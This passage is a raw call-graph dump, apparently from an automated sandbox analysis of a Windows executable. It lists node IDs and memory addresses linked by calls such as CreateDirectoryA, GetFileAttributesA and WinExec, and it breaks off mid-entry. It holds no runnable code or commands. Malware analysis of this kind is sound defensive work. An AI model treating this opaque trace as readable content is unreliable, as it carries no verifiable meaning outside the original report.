35801->35803 35805 2d7f0dc 35802->35805 35804 2d7e920 35803->35804 35806 2d647b0 11 API calls 35804->35806 35807 2d647b0 11 API calls 35805->35807 35808 2d7e93f 35806->35808 35809 2d7f0fb 35807->35809 35810 2d7e94a 35808->35810 35811 2d64964 35809->35811 35814 2d7e957 35810->35814 35812 2d7f106 35811->35812 35813 2d7f113 35812->35813 35815 2d77be8 17 API calls 35813->35815 35816 2d77be8 17 API calls 35814->35816 35817 2d7f11f 35815->35817 35818 2d7e963 35816->35818 37924 2d64da4 35817->37924 35820 2d7e974 35818->35820 38374 2d7c4dc 35820->38374 35827 2d644f4 11 API calls 35829 2d7e995 35827->35829 35831 2d64824 11 API calls 35829->35831 35832 2d7e9b6 35831->35832 35835 2d7e9c1 35832->35835 35838 2d7e9ce 35835->35838 35840 2d647b0 11 API calls 35838->35840 35842 2d7e9ed 35840->35842 35844 2d7e9f8 35842->35844 35847 2d7ea05 35844->35847 35849 2d77be8 17 API calls 35847->35849 35851 2d7ea11 35849->35851 35853 2d64824 11 API calls 35851->35853 35855 2d7ea32 35853->35855 35856 2d64964 35855->35856 35857 2d7ea3d 35856->35857 35858 2d64698 35857->35858 35860 2d7ea4a 35858->35860 35862 2d647b0 11 API calls 35860->35862 35865 2d7ea69 35862->35865 35867 2d64698 35865->35867 35869 2d7ea81 35867->35869 35871 2d77be8 17 API calls 35869->35871 35873 2d7ea8d 35871->35873 35875 2d64824 11 API calls 35873->35875 35877 2d7eaae 35875->35877 35879 2d64964 35877->35879 35881 2d7eab9 35879->35881 35882 2d64698 35881->35882 35883 2d7eac6 35882->35883 35884 2d647b0 11 API calls 35883->35884 35886 2d7eae5 35884->35886 35890 2d64698 35886->35890 35891 2d7eafd 35890->35891 35893 2d77be8 17 API calls 35891->35893 35895 2d7eb09 35893->35895 35897 2d7c640 16 API calls 35895->35897 35899 2d7eb1e 35897->35899 35901 2d657dc 13 API calls 35899->35901 35903 2d7eb31 35901->35903 35905 2d64824 11 API calls 35903->35905 35907 2d7eb52 35905->35907 35909 2d7eb6a 35907->35909 35910 2d647b0 11 API calls 35909->35910 35913 2d7eb89 35910->35913 35916 2d7eba1 35913->35916 35919 2d77be8 17 API calls 35916->35919 35921 2d7ebad 35919->35921 35923 2d64824 11 API calls 35921->35923 35928 2d7ebce 35923->35928 35929 2d647b0 11 API calls 35928->35929 35935 2d7ec05 35929->35935 35938 2d77be8 17 API calls 35935->35938 35940 2d7ec29 35938->35940 35942 2d644f4 11 API calls 35940->35942 35944 2d7ec38 35942->35944 38389 2d7c5c8 35944->38389 35950 2d7efa6 35952 2d64824 11 API calls 35950->35952 35951 2d7ec4a 35953 2d64824 11 API calls 35951->35953 35954 2d807a6 35952->35954 35958 2d7ec6b 35953->35958 35959 2d807be 35954->35959 35961 2d7ec83 35958->35961 35965 2d647b0 11 API calls 35959->35965 35964 2d647b0 11 API calls 35961->35964 35972 2d7eca2 35964->35972 35966 2d807dd 35965->35966 35969 2d807e8 35966->35969 35975 2d77be8 17 API calls 35969->35975 35974 2d7ecba 35972->35974 35977 2d77be8 17 API calls 35974->35977 35978 2d80801 35975->35978 35980 2d7ecc6 35977->35980 35981 2d64824 11 API calls 35978->35981 35983 2d64824 11 API calls 35980->35983 35984 2d80822 35981->35984 35986 2d7ece7 35983->35986 35989 2d8083a 35984->35989 35988 2d7ecf2 35986->35988 35990 2d7ecff 35988->35990 35993 2d647b0 11 API calls 35989->35993 35992 2d647b0 11 API calls 35990->35992 35995 2d7ed1e 35992->35995 35996 2d80859 35993->35996 36000 2d7ed29 35995->36000 35998 2d80864 35996->35998 36004 2d77be8 17 API calls 35998->36004 36003 2d7ed36 36000->36003 36006 2d77be8 17 API calls 36003->36006 36007 2d8087d 36004->36007 36009 2d7ed42 36006->36009 36010 2d64824 11 API calls 36007->36010 36012 2d64824 11 API calls 36009->36012 36017 2d8089e 36010->36017 36013 2d7ed63 36012->36013 36014 2d64964 36013->36014 36016 2d7ed6e 36014->36016 36018 2d64698 36016->36018 36019 2d808b6 36017->36019 36021 2d7ed7b 36018->36021 36023 2d647b0 11 API calls 36019->36023 36022 2d647b0 11 API calls 36021->36022 36025 2d7ed9a 36022->36025 36026 2d808d5 36023->36026 36029 2d64698 36025->36029 36027 2d808e0 36026->36027 36030 2d808ed 36027->36030 36032 2d7edb2 36029->36032 36033 2d77be8 17 API calls 36030->36033 36035 2d77be8 17 API calls 36032->36035 36036 2d808f9 36033->36036 36038 2d7edbe 36035->36038 36039 2d64824 11 API calls 36036->36039 36041 2d64824 11 API calls 36038->36041 36042 2d8091a 36039->36042 36044 2d7eddf 36041->36044 36047 2d80925 36042->36047 36046 2d64964 36044->36046 36049 2d7edea 36046->36049 36051 2d80932 36047->36051 36050 2d64698 36049->36050 36053 2d7edf7 36050->36053 36054 2d647b0 11 API calls 36051->36054 36056 2d647b0 11 API calls 36053->36056 36061 2d80951 36054->36061 36057 2d7ee16 36056->36057 36060 2d64698 36057->36060 36062 2d7ee2e 36060->36062 36063 2d80969 36061->36063 36065 2d77be8 17 API calls 36062->36065 36066 2d77be8 17 API calls 36063->36066 36068 2d7ee3a 36065->36068 36067 2d80975 36066->36067 36071 2d8099a 36067->36071 36072 2d88b9b 36067->36072 36070 2d64824 11 API calls 36068->36070 36074 2d7ee5b 36070->36074 36076 2d64824 11 API calls 36071->36076 36075 2d644c4 11 API calls 36072->36075 36078 2d64964 36074->36078 36079 2d88bb8 36075->36079 36080 2d809bb 36076->36080 36082 2d7ee66 36078->36082 36083 2d644c4 11 API calls 36079->36083 36086 2d809c6 36080->36086 36084 2d7ee73 36082->36084 36085 2d88bc8 36083->36085 36090 2d647b0 11 API calls 36084->36090 36088 2d644c4 11 API calls 36085->36088 36094 2d647b0 11 API calls 36086->36094 36091 2d88bd8 36088->36091 36092 2d7ee92 36090->36092 36093 2d644c4 11 API calls 36091->36093 36096 2d7ee9d 36092->36096 36097 2d88be8 36093->36097 36098 2d809f2 36094->36098 36100 2d7eeaa 36096->36100 36101 2d644c4 11 API calls 36097->36101 36104 2d809fd 36098->36104 36105 2d77be8 17 API calls 36100->36105 36103 2d88bf8 36101->36103 38416 2d64c24 36103->38416 36110 2d77be8 17 API calls 36104->36110 36108 2d7eeb6 36105->36108 36112 2d7eec0 36108->36112 36114 2d80a16 36110->36114 38395 2d64d38 36112->38395 36113 2d644a0 11 API calls 36116 2d88c0e 36113->36116 36118 2d64824 11 API calls 36114->36118 36117 2d64c24 SysFreeString 36116->36117 36121 2d88c19 36117->36121 36131 2d80a37 36118->36131 36124 2d644c4 11 API calls 36121->36124 36127 2d88c29 36124->36127 36130 2d644c4 11 API calls 36127->36130 36134 2d88c39 36130->36134 36138 2d647b0 11 API calls 36131->36138 36137 2d644c4 11 API calls 36134->36137 36141 2d88c49 36137->36141 36149 2d80a6e 36138->36149 36144 2d644a0 11 API calls 36141->36144 36146 2d88c54 36144->36146 36148 2d644c4 11 API calls 36146->36148 36152 2d88c64 36148->36152 36155 2d77be8 17 API calls 36149->36155 36154 2d644c4 11 API calls 36152->36154 36158 2d88c74 36154->36158 36159 2d80a92 36155->36159 36164 2d64c24 SysFreeString 36158->36164 36161 2d64824 11 API calls 36159->36161 36171 2d80ab3 36161->36171 36166 2d88c7f 36164->36166 36167 2d644c4 11 API calls 36166->36167 36168 2d88c8f 36167->36168 36170 2d64c24 SysFreeString 36168->36170 36174 2d88c9a 36170->36174 36175 2d80acb 36171->36175 36177 2d644c4 11 API calls 36174->36177 36178 2d647b0 11 API calls 36175->36178 36180 2d88caa 36177->36180 36187 2d80aea 36178->36187 36182 2d644c4 11 API calls 36180->36182 36184 2d88cba 36182->36184 36186 2d644a0 11 API calls 36184->36186 36189 2d88cc5 36186->36189 36190 2d80b02 36187->36190 36191 2d644c4 11 API calls 36189->36191 36192 2d77be8 17 API calls 36190->36192 36194 2d88cd5 36191->36194 36195 2d80b0e 36192->36195 36197 2d644c4 11 API calls 36194->36197 36198 2d64824 11 API calls 36195->36198 36200 2d88ce5 36197->36200 36201 2d80b2f 36198->36201 36203 2d644a0 11 API calls 36200->36203 36204 2d80b3a 36201->36204 36205 2d88cf0 36203->36205 36209 2d80b47 36204->36209 36206 2d644c4 11 API calls 36205->36206 36208 2d88d00 36206->36208 38419 2d64c3c 36208->38419 36212 2d647b0 11 API calls 36209->36212 36221 2d80b66 36212->36221 36216 2d644c4 11 API calls 36218 2d88d20 36216->36218 36220 2d644c4 11 API calls 36218->36220 36223 2d88d30 36220->36223 36224 2d80b7e 36221->36224 36226 2d64c24 SysFreeString 36223->36226 36227 2d77be8 17 API calls 36224->36227 36229 2d88d3b 36226->36229 36230 2d80b8a 36227->36230 36232 2d644a0 11 API calls 36229->36232 37926 2d67a88 36230->37926 36235 2d88d46 36232->36235 36238 2d64c24 SysFreeString 36235->36238 36240 2d88d51 36238->36240 36244 2d644c4 11 API calls 36240->36244 36242 2d644f4 11 API calls 36245 2d80bb6 36242->36245 36247 2d88d61 36244->36247 36249 2d64824 11 API calls 36245->36249 36248 2d644c4 11 API calls 36247->36248 36251 2d88d71 36248->36251 36258 2d80bd7 36249->36258 36253 2d64c24 SysFreeString 36251->36253 36255 2d88d7c 36253->36255 36257 2d644a0 11 API calls 36255->36257 36260 2d88d87 36257->36260 36261 2d80bef 36258->36261 36263 2d64c24 SysFreeString 36260->36263 36264 2d647b0 11 API calls 36261->36264 36266 2d88d92 36263->36266 36273 2d80c0e 36264->36273 36268 2d644c4 11 API calls 36266->36268 36270 2d88da2 36268->36270 36272 2d64c24 SysFreeString 36270->36272 36275 2d88dad 36272->36275 36276 2d80c26 36273->36276 36278 2d644a0 11 API calls 36275->36278 36279 2d77be8 17 API calls 36276->36279 36281 2d88db8 36278->36281 36282 2d80c32 36279->36282 36286 2d64c24 SysFreeString 36281->36286 36284 2d64824 11 API calls 36282->36284 36294 2d80c53 36284->36294 36288 2d88dc3 36286->36288 36289 2d644c4 11 API calls 36288->36289 36291 2d88dd3 36289->36291 36293 2d64c24 SysFreeString 36291->36293 36296 2d88dde 36293->36296 36297 2d80c6b 36294->36297 36299 2d644a0 11 API calls 36296->36299 36300 2d647b0 11 API calls 36297->36300 36302 2d88de9 36299->36302 36308 2d80c8a 36300->36308 36304 2d64c24 SysFreeString 36302->36304 36305 2d88df4 36304->36305 36307 2d644c4 11 API calls 36305->36307 36310 2d88e04 36307->36310 36311 2d80ca2 36308->36311 36313 2d644a0 11 API calls 36310->36313 36314 2d77be8 17 API calls 36311->36314 36316 2d88e0f 36313->36316 36317 2d80cae 36314->36317 36319 2d644c4 11 API calls 36316->36319 37939 2d7d20c 36317->37939 36322 2d88e1f 36319->36322 36327 2d644c4 11 API calls 36322->36327 36325 2d644f4 11 API calls 36328 2d80cce 36325->36328 36330 2d88e2f 36327->36330 36332 2d64824 11 API calls 36328->36332 38423 2d657a0 13 API calls 36330->38423 36341 2d80cef 36332->36341 36334 2d88e40 36336 2d644c4 11 API calls 36334->36336 36338 2d88e50 36336->36338 36340 2d644c4 11 API calls 36338->36340 36342 2d88e60 36340->36342 36344 2d647b0 11 API calls 36341->36344 38424 2d6e3b0 52 API calls 36342->38424 36347 2d80d26 36344->36347 36346 2d88e6b 36349 2d644c4 11 API calls 36346->36349 36352 2d80d31 36347->36352 36351 2d88e7b 36349->36351 36354 2d644c4 11 API calls 36351->36354 36358 2d77be8 17 API calls 36352->36358 36356 2d88e8b 36354->36356 36364 2d644c4 11 API calls 36356->36364 36360 2d80d4a 36358->36360 36362 2d64824 11 API calls 36360->36362 36371 2d80d6b 36362->36371 36366 2d88ea6 36364->36366 38425 2d657a0 13 API calls 36366->38425 36368 2d88eb7 36370 2d644c4 11 API calls 36368->36370 36373 2d88ec7 36370->36373 36376 2d647b0 11 API calls 36371->36376 36375 2d644a0 11 API calls 36373->36375 36378 2d88ed2 36375->36378 36379 2d80da2 36376->36379 36381 2d644c4 11 API calls 36378->36381 36383 2d80dad 36379->36383 36382 2d88ee2 36381->36382 36385 2d644c4 11 API calls 36382->36385 36388 2d80dba 36383->36388 36387 2d88ef2 36385->36387 38426 2d657a0 13 API calls 36387->38426 36391 2d77be8 17 API calls 36388->36391 36394 2d80dc6 36391->36394 36393 2d88f03 36396 2d644c4 11 API calls 36393->36396 36397 2d64824 11 API calls 36394->36397 36399 2d88f13 36396->36399 36400 2d80de7 36397->36400 36402 2d64c24 SysFreeString 36399->36402 36403 2d80df2 36400->36403 36405 2d88f1e 36402->36405 36409 2d80dff 36403->36409 36406 2d644c4 11 API calls 36405->36406 36408 2d88f2e 36406->36408 36410 2d64c24 SysFreeString 36408->36410 36411 2d647b0 11 API calls 36409->36411 36413 2d88f39 36410->36413 36414 2d80e1e 36411->36414 36416 2d644c4 11 API calls 36413->36416 36418 2d80e29 36414->36418 36417 2d88f49 36416->36417 38427 2d657a0 13 API calls 36417->38427 36423 2d80e36 36418->36423 36422 2d88f5a 36425 2d644c4 11 API calls 36422->36425 36426 2d77be8 17 API calls 36423->36426 36428 2d88f6a 36425->36428 36429 2d80e42 36426->36429 36431 2d64c24 SysFreeString 36428->36431 36434 2d80e53 36429->36434 36433 2d88f75 36431->36433 36436 2d644c4 11 API calls 36433->36436 37944 2d7c640 36434->37944 36439 2d88f85 36436->36439 36444 2d644c4 11 API calls 36439->36444 36447 2d88f95 36444->36447 36448 2d644c4 11 API calls 36447->36448 36450 2d88fa5 36448->36450 36449 2d64824 11 API calls 36451 2d80e9d 36449->36451 36453 2d644c4 11 API calls 36450->36453 36456 2d80ea8 36451->36456 36455 2d88fb5 36453->36455 36455->35387 36459 2d80eb5 36456->36459 36461 2d647b0 11 API calls 36459->36461 36466 2d80ed4 36461->36466 36468 2d80eec 36466->36468 36470 2d77be8 17 API calls 36468->36470 36472 2d80ef8 36470->36472 36474 2d64824 11 API calls 36472->36474 36475 2d80f19 36474->36475 36478 2d80f24 36475->36478 36481 2d80f31 36478->36481 36483 2d647b0 11 API calls 36481->36483 36488 2d80f50 36483->36488 36490 2d80f68 36488->36490 36492 2d77be8 17 API calls 36490->36492 36494 2d80f74 36492->36494 36495 2d644f4 11 API calls 36494->36495 36497 2d80f83 36495->36497 36498 2d644f4 11 API calls 36497->36498 36499 2d80f92 36498->36499 36501 2d644f4 11 API calls 36499->36501 36502 2d80fa1 36501->36502 36504 2d644f4 11 API calls 36502->36504 36506 2d80fb0 36504->36506 36507 2d644f4 11 API calls 36506->36507 36509 2d80fbf 36507->36509 36511 2d644f4 11 API calls 36509->36511 36513 2d80fce 36511->36513 36515 2d644f4 11 API calls 36513->36515 36516 2d80fdd 36515->36516 36517 2d644f4 11 API calls 36516->36517 36518 2d80fec 36517->36518 36520 2d644f4 11 API calls 36518->36520 36521 2d80ffb 36520->36521 36523 2d644f4 11 API calls 36521->36523 36524 2d8100a 36523->36524 36526 2d644f4 11 API calls 36524->36526 36527 2d81019 36526->36527 36528 2d64824 11 API calls 36527->36528 36533 2d8103a 36528->36533 36535 2d647b0 11 API calls 36533->36535 36539 2d81071 36535->36539 36540 2d77be8 17 API calls 36539->36540 36542 2d81095 36540->36542 36543 2d64824 11 API calls 36542->36543 36547 2d810b6 36543->36547 36549 2d810ce 36547->36549 36550 2d647b0 11 API calls 36549->36550 36552 2d810ed 36550->36552 36553 2d81105 36552->36553 36554 2d77be8 17 API calls 36553->36554 36557 2d81111 36554->36557 36558 2d81128 36557->36558 37961 2d67e3c 36558->37961 36562 2d8113b 36565 2d64824 11 API calls 36562->36565 36563 2d81324 36564 2d64824 11 API calls 36563->36564 36566 2d81345 36564->36566 36567 2d8115c 36565->36567 36569 2d81350 36566->36569 36573 2d81174 36567->36573 36572 2d8135d 36569->36572 36574 2d647b0 11 API calls 36572->36574 36575 2d647b0 11 API calls 36573->36575 36576 2d8137c 36574->36576 36579 2d81193 36575->36579 36580 2d81394 36576->36580 36581 2d77be8 17 API calls 36579->36581 36582 2d77be8 17 API calls 36580->36582 36583 2d811b7 36581->36583 36585 2d813a0 36582->36585 36586 2d64824 11 API calls 36583->36586 36588 2d64824 11 API calls 36585->36588 36590 2d811d8 36586->36590 36589 2d813c1 36588->36589 36591 2d813cc 36589->36591 36595 2d811f0 36590->36595 36594 2d813d9 36591->36594 36596 2d647b0 11 API calls 36594->36596 36597 2d647b0 11 API calls 36595->36597 36598 2d813f8 36596->36598 36599 2d8120f 36597->36599 36603 2d81410 36598->36603 36604 2d81227 36599->36604 36606 2d77be8 17 API calls 36603->36606 36605 2d77be8 17 API calls 36604->36605 36607 2d81233 36605->36607 36609 2d8141c 36606->36609 36614 2d647b0 11 API calls 36607->36614 36612 2d649c4 11 API calls 36609->36612 36613 2d8144f 36612->36613 36616 2d64824 11 API calls 36613->36616 36618 2d81262 36614->36618 36619 2d81470 36616->36619 36621 2d77be8 17 API calls 36618->36621 36623 2d647b0 11 API calls 36619->36623 36624 2d81286 36621->36624 36629 2d814a7 36623->36629 36626 2d64824 11 API calls 36624->36626 36627 2d812a7 36626->36627 36630 2d812bf 36627->36630 36633 2d77be8 17 API calls 36629->36633 36634 2d647b0 11 API calls 36630->36634 36636 2d814cb 36633->36636 36637 2d812de 36634->36637 36639 2d64824 11 API calls 36636->36639 36640 2d812f6 36637->36640 36641 2d814ec 36639->36641 36644 2d77be8 17 API calls 36640->36644 36643 2d81504 36641->36643 36646 2d647b0 11 API calls 36643->36646 36647 2d81302 36644->36647 36650 2d81523 36646->36650 36648 2d81319 36647->36648 38397 2d68004 CreateDirectoryA 36648->38397 36651 2d8153b 36650->36651 36655 2d77be8 17 API calls 36651->36655 36657 2d81547 36655->36657 36659 2d64824 11 API calls 36657->36659 36661 2d81568 36659->36661 36663 2d81573 36661->36663 36666 2d647b0 11 API calls 36663->36666 36668 2d8159f 36666->36668 36671 2d815aa 36668->36671 36674 2d77be8 17 API calls 36671->36674 36675 2d815c3 36674->36675 36677 2d64824 11 API calls 36675->36677 36682 2d815e4 36677->36682 36684 2d647b0 11 API calls 36682->36684 36687 2d8161b 36684->36687 36690 2d77be8 17 API calls 36687->36690 36692 2d8163f 36690->36692 36697 2d81654 36692->36697 36698 2d83345 36692->36698 36701 2d64824 11 API calls 36697->36701 36700 2d64824 11 API calls 36698->36700 36703 2d83366 36700->36703 36706 2d81692 36701->36706 36708 2d83371 36703->36708 36707 2d816aa 36706->36707 36709 2d67e18 GetFileAttributesA 36707->36709 36710 2d647b0 11 API calls 36708->36710 36711 2d816b5 36709->36711 36713 2d8339d 36710->36713 36711->36698 36714 2d816bd 36711->36714 36720 2d833a8 36713->36720 36716 2d64824 11 API calls 36714->36716 36723 2d816de 36716->36723 36722 2d77be8 17 API calls 36720->36722 36725 2d833c1 36722->36725 36729 2d647b0 11 API calls 36723->36729 36726 2d64824 11 API calls 36725->36726 36732 2d833e2 36726->36732 36734 2d81715 36729->36734 36735 2d647b0 11 API calls 36732->36735 36736 2d77be8 17 API calls 36734->36736 36742 2d83419 36735->36742 36737 2d81739 36736->36737 36739 2d64824 11 API calls 36737->36739 36746 2d8175a 36739->36746 36745 2d77be8 17 API calls 36742->36745 36748 2d8343d 36745->36748 36749 2d81772 36746->36749 36751 2d64824 11 API calls 36748->36751 36752 2d647b0 11 API calls 36749->36752 36754 2d8345e 36751->36754 36758 2d81791 36752->36758 36757 2d83476 36754->36757 36760 2d647b0 11 API calls 36757->36760 36761 2d817a9 36758->36761 36763 2d83495 36760->36763 36764 2d77be8 17 API calls 36761->36764 36770 2d834ad 36763->36770 36765 2d817b5 36764->36765 36767 2d64824 11 API calls 36765->36767 36768 2d817d6 36767->36768 36771 2d817e1 36768->36771 36773 2d77be8 17 API calls 36770->36773 36778 2d647b0 11 API calls 36771->36778 36775 2d834b9 36773->36775 36777 2d64824 11 API calls 36775->36777 36780 2d834da 36777->36780 36781 2d8180d 36778->36781 36786 2d834e5 36780->36786 36783 2d81818 36781->36783 36790 2d77be8 17 API calls 36783->36790 36787 2d647b0 11 API calls 36786->36787 36789 2d83511 36787->36789 36796 2d8351c 36789->36796 36791 2d81831 36790->36791 36792 2d81841 36791->36792 36794 2d67e3c GetFileAttributesA 36792->36794 36797 2d8184c 36794->36797 36798 2d77be8 17 API calls 36796->36798 36797->36698 36799 2d81854 36797->36799 36801 2d83535 36798->36801 36802 2d64824 11 API calls 36799->36802 36804 2d64824 11 API calls 36801->36804 36808 2d81875 36802->36808 36810 2d83556 36804->36810 36813 2d647b0 11 API calls 36808->36813 36812 2d647b0 11 API calls 36810->36812 36818 2d8358d 36812->36818 36819 2d818ac 36813->36819 36822 2d77be8 17 API calls 36818->36822 36820 2d77be8 17 API calls 36819->36820 36823 2d818d0 36820->36823 36825 2d835b1 36822->36825 36826 2d64824 11 API calls 36823->36826 37970 2d7c78c 36825->37970 36835 2d818f1 36826->36835 36832 2d644f4 11 API calls 36834 2d835d7 36832->36834 36837 2d64824 11 API calls 36834->36837 36840 2d647b0 11 API calls 36835->36840 36839 2d835f8 36837->36839 36845 2d83603 36839->36845 36847 2d81928 36840->36847 36846 2d647b0 11 API calls 36845->36846 36848 2d8362f 36846->36848 36851 2d77be8 17 API calls 36847->36851 36850 2d8363a 36848->36850 36854 2d83647 36850->36854 36856 2d8194c 36851->36856 36858 2d77be8 17 API calls 36854->36858 38398 2d6794c 11 API calls 36856->38398 36860 2d83653 36858->36860 36863 2d64824 11 API calls 36860->36863 36866 2d83674 36863->36866 36864 2d81981 36869 2d64824 11 API calls 36864->36869 36872 2d8367f 36866->36872 36877 2d819d8 36869->36877 36873 2d647b0 11 API calls 36872->36873 36875 2d836ab 36873->36875 36876 2d836b6 36875->36876 36879 2d836c3 36876->36879 36880 2d647b0 11 API calls 36877->36880 36883 2d77be8 17 API calls 36879->36883 36885 2d81a0f 36880->36885 36884 2d836cf 36883->36884 36887 2d67a88 42 API calls 36884->36887 36890 2d77be8 17 API calls 36885->36890 36889 2d836d9 36887->36889 36892 2d7d270 11 API calls 36889->36892 36893 2d81a33 36890->36893 36894 2d836eb 36892->36894 36895 2d64824 11 API calls 36893->36895 36896 2d644f4 11 API calls 36894->36896 36901 2d81a79 36895->36901 36897 2d836fb 36896->36897 36899 2d64824 11 API calls 36897->36899 36900 2d8371c 36899->36900 36902 2d83727 36900->36902 37965 2d74d90 36901->37965 36903 2d647b0 11 API calls 36902->36903 36905 2d83753 36903->36905 36904 2d81aa1 36904->35387 36906 2d77be8 17 API calls 36905->36906 36908 2d83777 36906->36908 36910 2d64824 11 API calls 36908->36910 36912 2d83798 36910->36912 36915 2d647b0 11 API calls 36912->36915 36920 2d837cf 36915->36920 36923 2d77be8 17 API calls 36920->36923 36925 2d837f3 36923->36925 36927 2d64824 11 API calls 36925->36927 36929 2d83814 36927->36929 36932 2d647b0 11 API calls 36929->36932 36937 2d8384b 36932->36937 36940 2d77be8 17 API calls 36937->36940 36942 2d8386f 36940->36942 36944 2d64824 11 API calls 36942->36944 36948 2d83890 36944->36948 36950 2d647b0 11 API calls 36948->36950 36953 2d838c7 36950->36953 36956 2d77be8 17 API calls 36953->36956 36958 2d838eb 36956->36958 37983 2d7d198 36958->37983 36962 2d7d20c 11 API calls 36964 2d8390c 36962->36964 36966 2d644f4 11 API calls 36964->36966 36967 2d8391c 36966->36967 36968 2d64824 11 API calls 36967->36968 36971 2d8393d 36968->36971 36972 2d647b0 11 API calls 36971->36972 36975 2d83974 36972->36975 36976 2d77be8 17 API calls 36975->36976 36977 2d83998 36976->36977 36978 2d64824 11 API calls 36977->36978 36979 2d839b9 36978->36979 36980 2d647b0 11 API calls 36979->36980 36981 2d839f0 36980->36981 36982 2d77be8 17 API calls 36981->36982 36983 2d83a14 36982->36983 36984 2d64824 11 API calls 36983->36984 36985 2d83a35 36984->36985 36986 2d647b0 11 API calls 36985->36986 36987 2d83a6c 36986->36987 36988 2d77be8 17 API calls 36987->36988 36989 2d83a90 36988->36989 36990 2d64824 11 API calls 36989->36990 36991 2d83ab1 36990->36991 36992 2d647b0 11 API calls 36991->36992 36993 2d83ae8 36992->36993 36994 2d77be8 17 API calls 36993->36994 36995 2d83b0c 36994->36995 36996 2d64824 11 API calls 36995->36996 36997 2d83b2d 36996->36997 36998 2d647b0 11 API calls 36997->36998 36999 2d83b64 36998->36999 37000 2d77be8 17 API calls 36999->37000 37001 2d83b88 37000->37001 37002 2d64824 11 API calls 37001->37002 37003 2d83ba9 37002->37003 37004 2d647b0 11 API calls 37003->37004 37005 2d83be0 37004->37005 37006 2d77be8 17 API calls 37005->37006 37007 2d83c04 37006->37007 37008 2d853e0 37007->37008 37009 2d64824 11 API calls 37007->37009 37010 2d64824 11 API calls 37008->37010 37012 2d83c39 37009->37012 37011 2d85401 37010->37011 37013 2d647b0 11 API calls 37011->37013 37014 2d67e18 GetFileAttributesA 37012->37014 37018 2d85438 37013->37018 37015 2d83c5c 37014->37015 37015->37008 37016 2d83c64 37015->37016 37017 2d64824 11 API calls 37016->37017 37020 2d83c85 37017->37020 37019 2d77be8 17 API calls 37018->37019 37021 2d8545c 37019->37021 37023 2d647b0 11 API calls 37020->37023 37022 2d64824 11 API calls 37021->37022 37024 2d8547d 37022->37024 37025 2d83cbc 37023->37025 37026 2d647b0 11 API calls 37024->37026 37027 2d77be8 17 API calls 37025->37027 37030 2d854b4 37026->37030 37028 2d83ce0 37027->37028 37029 2d64824 11 API calls 37028->37029 37033 2d83d01 37029->37033 37031 2d77be8 17 API calls 37030->37031 37032 2d854d8 37031->37032 37034 2d64824 11 API calls 37032->37034 37035 2d647b0 11 API calls 37033->37035 37036 2d854f9 37034->37036 37037 2d83d38 37035->37037 37038 2d647b0 11 API calls 37036->37038 37039 2d77be8 17 API calls 37037->37039 37042 2d85530 37038->37042 37040 2d83d5c 37039->37040 37041 2d64824 11 API calls 37040->37041 37045 2d83d7d 37041->37045 37043 2d77be8 17 API calls 37042->37043 37044 2d85554 37043->37044 37046 2d64824 11 API calls 37044->37046 37047 2d647b0 11 API calls 37045->37047 37048 2d85575 37046->37048 37049 2d83db4 37047->37049 37050 2d647b0 11 API calls 37048->37050 37051 2d77be8 17 API calls 37049->37051 37054 2d855ac 37050->37054 37052 2d83dd8 37051->37052 37053 2d64824 11 API calls 37052->37053 37057 2d83df9 37053->37057 37055 2d77be8 17 API calls 37054->37055 37056 2d855d0 37055->37056 37058 2d64824 11 API calls 37056->37058 37059 2d64824 11 API calls 37057->37059 37060 2d855f1 37058->37060 37061 2d83e31 37059->37061 37062 2d647b0 11 API calls 37060->37062 37063 2d647b0 11 API calls 37061->37063 37064 2d85628 37062->37064 37065 2d83e68 37063->37065 37066 2d77be8 17 API calls 37064->37066 37068 2d77be8 17 API calls 37065->37068 37067 2d8564c 37066->37067 37071 2d86190 37067->37071 37072 2d85661 37067->37072 37069 2d83e8c 37068->37069 37070 2d64824 11 API calls 37069->37070 37075 2d83ead 37070->37075 37073 2d64824 11 API calls 37071->37073 37074 2d64824 11 API calls 37072->37074 37077 2d861b1 37073->37077 37078 2d85682 37074->37078 37076 2d647b0 11 API calls 37075->37076 37081 2d83ee4 37076->37081 37079 2d647b0 11 API calls 37077->37079 37080 2d647b0 11 API calls 37078->37080 37084 2d861e8 37079->37084 37082 2d856b9 37080->37082 37083 2d77be8 17 API calls 37081->37083 37086 2d77be8 17 API calls 37082->37086 37085 2d83f08 37083->37085 37088 2d77be8 17 API calls 37084->37088 37087 2d64824 11 API calls 37085->37087 37089 2d856dd 37086->37089 37093 2d83f29 37087->37093 37090 2d8620c 37088->37090 37092 2d64824 11 API calls 37089->37092 37091 2d64824 11 API calls 37090->37091 37094 2d8622d 37091->37094 37095 2d856fe 37092->37095 37096 2d647b0 11 API calls 37093->37096 37097 2d647b0 11 API calls 37094->37097 37098 2d647b0 11 API calls 37095->37098 37099 2d83f60 37096->37099 37101 2d86264 37097->37101 37102 2d85735 37098->37102 37100 2d77be8 17 API calls 37099->37100 37103 2d83f84 37100->37103 37106 2d77be8 17 API calls 37101->37106 37104 2d77be8 17 API calls 37102->37104 37105 2d64824 11 API calls 37103->37105 37107 2d85759 37104->37107 37111 2d83fa5 37105->37111 37108 2d86288 37106->37108 37109 2d64824 11 API calls 37107->37109 37110 2d64824 11 API calls 37108->37110 37113 2d8577a 37109->37113 37112 2d862a9 37110->37112 37114 2d647b0 11 API calls 37111->37114 37115 2d647b0 11 API calls 37112->37115 37116 2d647b0 11 API calls 37113->37116 37117 2d83fdc 37114->37117 37119 2d862e0 37115->37119 37120 2d857b1 37116->37120 37118 2d77be8 17 API calls 37117->37118 37121 2d84000 37118->37121 37123 2d77be8 17 API calls 37119->37123 37124 2d77be8 17 API calls 37120->37124 37122 2d64824 11 API calls 37121->37122 37130 2d8403a 37122->37130 37125 2d86304 37123->37125 37126 2d857d5 37124->37126 37128 2d64824 11 API calls 37125->37128 37127 2d647b0 11 API calls 37126->37127 37129 2d857ed 37127->37129 37132 2d86325 37128->37132 37131 2d857f8 WinExec 37129->37131 37134 2d64824 11 API calls 37130->37134 37133 2d64824 11 API calls 37131->37133 37135 2d647b0 11 API calls 37132->37135 37136 2d8581f 37133->37136 37137 2d84072 37134->37137 37139 2d8635c 37135->37139 37140 2d647b0 11 API calls 37136->37140 37138 2d647b0 11 API calls 37137->37138 37142 2d840a9 37138->37142 37141 2d77be8 17 API calls 37139->37141 37143 2d85856 37140->37143 37147 2d86380 37141->37147 37145 2d77be8 17 API calls 37142->37145 37144 2d77be8 17 API calls 37143->37144 37148 2d8587a 37144->37148 37149 2d840cd 37145->37149 37146 2d86b54 37150 2d64824 11 API calls 37146->37150 37147->37146 37151 2d64824 11 API calls 37147->37151 37152 2d64824 11 API calls 37148->37152 37153 2d64824 11 API calls 37149->37153 37154 2d86b75 37150->37154 37155 2d863b6 37151->37155 37156 2d8589b 37152->37156 37157 